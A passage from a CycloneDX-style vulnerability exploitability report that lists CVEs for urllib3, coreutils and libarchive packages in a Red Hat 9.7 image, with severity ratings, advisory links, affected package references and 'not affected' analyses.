"urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" } ] }, { "id": "CVE-2025-50182", "ratings": [ { "source": { "name": "ghsa" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "nvd" }, "score": 6.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 601 ], "description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-50182" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-50182" }, { "url": "https://github.com/urllib3/urllib3" }, { "url": "https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f" }, { "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0" }, { "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50182" }, { "url": "https://ubuntu.com/security/notices/USN-7599-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-50182" } ], "published": "2025-06-19T02:15:17+00:00", "updated": "2025-12-22T19:15:49+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n linux-vdso.so.1 (0x0000ffff8cd00000)\n libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)" } }, { "id": "CVE-2025-5278", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" } ], "cwes": [ 121 ], "description": "A flaw was found in GNU Coreutils. The sort utility's begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-5278" }, { "url": "http://www.openwall.com/lists/oss-security/2025/05/27/2" }, { "url": "http://www.openwall.com/lists/oss-security/2025/05/29/1" }, { "url": "http://www.openwall.com/lists/oss-security/2025/05/29/2" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-5278" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2368764" }, { "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/commit/?id=8c9602e3a145e9596dc1a63c6ed67865814b6633" }, { "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/tree/NEWS?id=8c9602e3a145e9596dc1a63c6ed67865814b6633#n14" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5278" }, { "url": "https://security-tracker.debian.org/tracker/CVE-2025-5278" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-5278" } ], "published": "2025-05-27T21:15:23+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "8.32-39.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-5915", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 6.6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.6, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 122 ], "description": "A vulnerability has been identified in the libarchive library. This flaw can lead to a heap buffer over-read due to the size of a filter block potentially exceeding the Lempel-Ziv-Storer-Schieber (LZSS) window. This means the library may attempt to read beyond the allocated memory buffer, which can result in unpredictable program behavior, crashes (denial of service), or the disclosure of sensitive information from adjacent memory regions.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-5915" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-5915" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370865" }, { "url": "https://github.com/libarchive/libarchive/pull/2599" }, { "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5915" }, { "url": "https://ubuntu.com/security/notices/USN-7601-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-5915" } ], "published": "2025-06-09T20:15:26+00:00", "updated": "2026-01-08T04:15:55+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-5916", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5.6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 190 ], "description": "A vulnerability has been identified in the libarchive library. This flaw involves an integer overflow that can be triggered when processing a Web Archive (WARC) file that claims to have more than INT64_MAX - 4 content bytes. An attacker could craft a malicious WARC archive to induce this overflow, potentially leading to unpredictable program behavior, memory corruption, or a denial-of-service condition within applications that process such archives using libarchive. This bug affects libarchive versions prior to 3.8.0.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-5916" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-5916" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370872" }, { "url": "https://github.com/libarchive/libarchive/pull/2568" }, { "url": "https://github.com/libarchive/libarchive/pull/2568/commits/bce70c4c26864df2a8d6953e7db6e4b156253508" }, { "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5916" }, { "url": "https://ubuntu.com/security/notices/USN-7601-1" }, { "url": "https://ubuntu.com/security/notices/USN-8147-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-5916" } ], "published": "2025-06-09T20:15:27+00:00", "updated": "2025-12-12T01:15:46+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-5917", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 2.8, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 787 ], "description": "A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation. This bug affects libarchive versions prior to 3.8.0.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-5917" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-5917" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370874" }, { "url": "https://github.com/libarchive/libarchive/pull/2588" }, { "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5917" }, { "url": "https://ubuntu.com/security/notices/USN-7601-1" }, { "url": "https://ubuntu.com/security/notices/USN-8147-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-5917" } ], "published": "2025-06-09T20:15:27+00:00", "updated": "2025-12-12T01:15:46+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-5918", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 6.6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 125 ], "description": "A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-5918" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-5918" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370877" }, { "url": "https://github.com/libarchive/libarchive/pull/2584" }, { "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5918" }, { "url": "https://ubuntu.com/security/notices/USN-8147-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-5918" } ], "published": "2025-06-09T20:15:27+00:00", "updated": "2025-08-15T18:35:04+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": 